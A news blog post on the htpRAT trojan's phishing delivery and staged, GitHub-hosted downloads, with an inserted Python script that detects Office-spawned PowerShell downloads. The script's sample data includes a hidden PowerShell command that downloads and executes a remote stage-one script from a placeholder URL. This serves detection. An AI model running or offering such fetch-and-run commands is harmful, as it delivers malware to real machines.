htpRAT Latest Sign that Cybercriminals are Getting Smarter

Posted Date 11/06/17

The htpRAT malware attack on a number of computers in Southeast Asia is yet one more sign that cybercriminals are getting smarter and more difficult to catch. Believed to be backed financially by the Chinese government, the htpRAT is a new-generation Remote Access Trojan that, in addition to the usual features of this sort of malware, has additional ones that, unfortunately for the victims, improve its efficiency.

Like other RATs, the htpRAT logs keystrokes to steal security credentials, captures data from screenshots, can manage files on the victim’s computer, and can record audio and video from the computer’s webcam. On top of that, the people behind the htpRAT use the Command and Control server side to create new functionalities and commands that are then sent to the malware for execution.

Writing for the Enterprise Times, technology analyst Ian Murphy notes that, like other malware, the htpRAT is distributed via a spear phishing campaign sending an Excel file with macros that, when the file’s macros are enabled, start a Windows PowerShell command and staged downloads.

The staged download approach makes it harder for the victim to detect the attack and easier for the cyberattacker to detect any cybersecurity software on the target device. Researchers from security solutions provider RiskIQ found that the malware downloaded code in five stages in total, with the first four setting the stage for the actual download of the malware program.

Interestingly, Murphy notes that the cyberattackers behind the htpRAT hosted their payload on GitHub, which, unlike most payload servers, is unlikely to ever get blocked simply because of the number of organizations using it for software development. At the same time, the good news for cybersecurity researchers is that GitHub stores history, so the RiskIQ researchers were able to glean some common malware components and details about the identity of the attackers.
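The macro-to-PowerShell chain and the GitHub-hosted staging described above are behaviour a defender can look for in process-creation telemetry. The following is an added example, not code from the article or from RiskIQ; the event field names, the hypothetical download-cmdlet list and the sample events are constructed for illustration.

```python
"""Detection sketch (added example, not the article's or RiskIQ's code): flag an Office
application spawning PowerShell that fetches remote content. Event fields are a
hypothetical, constructed telemetry format modelled on process-creation logs."""
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
DOWNLOAD_CMDLETS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# Code-hosting domains are rarely blocked at the perimeter (the article's GitHub
# point), so a hit here deserves a look even though the host itself is benign.
CODE_HOSTS = {"raw.githubusercontent.com", "github.com", "gist.githubusercontent.com"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of reasons a process-creation event looks suspicious."""
    reasons = []
    parent, child = basename(event["parent_image"]), basename(event["image"])
    cmd = event.get("command_line", "")
    if parent in OFFICE_PARENTS and child in {"powershell.exe", "pwsh.exe"}:
        reasons.append("office_spawned_powershell")
        if DOWNLOAD_CMDLETS.search(cmd):
            reasons.append("powershell_download_cmdlet")
        hosts = {h.lower() for h in URL_RE.findall(cmd)}
        if hosts & CODE_HOSTS:
            reasons.append("payload_on_code_hosting_site")
    return reasons

def triage(events):
    return [(e["pid"], classify(e)) for e in events if classify(e)]

# Constructed sample telemetry (not real indicators).
SAMPLE_EVENTS = [
    {"pid": 4001, "parent_image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EXAMPLE/stage1.ps1')\""},
    {"pid": 4002, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-ChildItem"},
    {"pid": 4003, "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd /c dir"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```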

Among the information obtained about the attackers was the fact that they had registered their C2 domain two years ago, which, according to RiskIQ, points to Chinese government backing: state-backed hackers enjoy more time to plan their attacks. For cybersecurity software that uses the age of a domain registration as an indicator of the domain owner’s reputation, an old registration is a way of subverting that check, and it was used that way in this case as well. According to Murphy and RiskIQ, the attackers behind htpRAT have long-term plans that are linked to China’s regional dominance plans. Initially infecting small businesses, over time the attackers can start infecting larger, internationally present organizations, potentially wreaking havoc on various industries.

Copyright © 2012 Recharge Asia Corp. All Rights Reserved.